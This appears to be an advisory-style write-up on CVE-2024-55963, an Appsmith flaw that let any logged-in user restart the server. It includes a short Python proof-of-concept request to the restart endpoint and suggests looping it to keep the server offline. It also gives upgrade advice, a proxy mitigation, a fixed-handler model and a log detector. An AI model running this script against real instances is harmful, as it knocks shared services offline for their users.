A serious oversight has been found in Appsmith, a popular open-source platform for building internal tools, before version 1.51. Due to weak access control checks on a sensitive API, any logged-in user could restart the Appsmith server—even if they weren't an admin. For teams using Appsmith for critical operations, this means any unprivileged user could cause a denial of service simply by hitting an endpoint over and over. The restart only affects the Appsmith container/server, but the impact is still disruptive.
- Product Affected: Appsmith before v1.51
- Type: Missing Authorization Check / Privilege Escalation
- Impact: Authenticated non-admin users can restart the Appsmith server container via API
- CVE Link: NVD - CVE-2024-55963
The Root Cause
The /api/v1/admin/restart endpoint (and similar) only checked if the user was authenticated, not if they had admin or superuser privileges. Anyone logged into Appsmith could trigger a full restart of the server that everyone was using.
Attacker sends an HTTP request to the restart endpoint:
- Endpoint: /api/v1/admin/restart
Let's see what this would look like using Python and the requests library:

```python
import requests

# Assume you have a user's session cookie or JWT token after logging in
BASE_URL = "http://your-appsmith-instance.com"
RESTART_ENDPOINT = "/api/v1/admin/restart"

SESSION = requests.Session()
SESSION.cookies.set("your-session-cookie-name", "your-session-cookie-value")

# Send the POST request to the restart endpoint
response = SESSION.post(BASE_URL + RESTART_ENDPOINT)

if response.status_code == 200:
    print("Server restart triggered!")
else:
    print(f"Error: {response.status_code} - {response.text}")
```
Note: It doesn't matter if you are a regular user—if you are authenticated, this will work on vulnerable Appsmith versions.
Automate this in a loop, and the server will be stuck in constant restart hell—effectively offline.
This is especially risky for deployments with many non-admin users.
Note: This affects only the Appsmith app container, not your whole system. But denial of service is denial of service, even in just one app.
How to Fix
Upgrade!
Appsmith has patched this issue. Upgrade to version 1.51 or later.
- Appsmith Release Notes: Github Release
- Official Security Announcement *(replace with final advisory link when available)*
If you can’t upgrade immediately, block access to the restart API by using a reverse proxy or API gateway to allow only admins to hit that endpoint.
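To make the root cause and the mitigation concrete, here is an added example (not Appsmith's own code) that models the pre-1.51 authentication-only check next to a handler that also enforces authorization, and then runs a simple detector over constructed access-log lines to flag users who repeatedly hit the restart endpoint. The `Session` class, its `is_superuser` field, the log format and the threshold are all assumptions for illustration.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed model of a logged-in session; field names are assumptions, not Appsmith's.
@dataclass
class Session:
    user: str
    is_superuser: bool

RESTART_ENDPOINT = "/api/v1/admin/restart"

def restart_handler_vulnerable(session):
    """Authentication-only check: the behaviour described for versions before 1.51."""
    if session is None:
        return 401          # not logged in
    return 200              # any logged-in user may restart

def restart_handler_fixed(session):
    """Authentication AND authorization: only a superuser may trigger a restart."""
    if session is None:
        return 401          # not logged in
    if not session.is_superuser:
        return 403          # logged in, but not allowed to do this
    return 200

# Constructed access-log lines in a combined-log style (not real Appsmith logs).
SAMPLE_LOG = """\
10.0.0.5 - alice [26/Mar/2025:20:15:21 +0000] "POST /api/v1/admin/restart HTTP/1.1" 200 12
10.0.0.5 - alice [26/Mar/2025:20:15:40 +0000] "POST /api/v1/admin/restart HTTP/1.1" 200 12
10.0.0.5 - alice [26/Mar/2025:20:16:02 +0000] "POST /api/v1/admin/restart HTTP/1.1" 200 12
10.0.0.9 - bob [26/Mar/2025:20:16:10 +0000] "GET /api/v1/applications HTTP/1.1" 200 3021
10.0.0.7 - carol [26/Mar/2025:21:00:00 +0000] "POST /api/v1/admin/restart HTTP/1.1" 200 12
"""

LOG_RE = re.compile(r'^(\S+) - (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def restart_calls_by_user(log_text, threshold=2):
    """Count successful restart POSTs per user and return those at or above threshold."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        _ip, user, method, path, status = m.groups()
        if method == "POST" and path == RESTART_ENDPOINT and status == "200":
            counts[user] += 1
    return {user: n for user, n in counts.items() if n >= threshold}
```

Running the detector over real proxy or application logs with a low threshold is a cheap way to spot abuse of this endpoint on instances that have not yet been upgraded.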
References and More Info
- CVE-2024-55963 on NVD
- Appsmith Github
- Appsmith Releases
Final Thoughts
CVE-2024-55963 is a classic example of "*authentication* isn't enough—*authorization* matters!" If you’re an Appsmith admin, check your version, patch ASAP, and take a quick look at your other internal tools for similar flaws. Sometimes impacts stay inside a single container, but downtime always causes real headaches.
Stay vigilant and patch your platforms!
*Written exclusively based on the disclosed information and simplified for clarity. For any questions or responsible disclosure concerns, contact the Appsmith team via their security reporting process.*
Timeline
Published on: 03/26/2025 20:15:21 UTC
Last modified on: 04/01/2025 16:34:41 UTC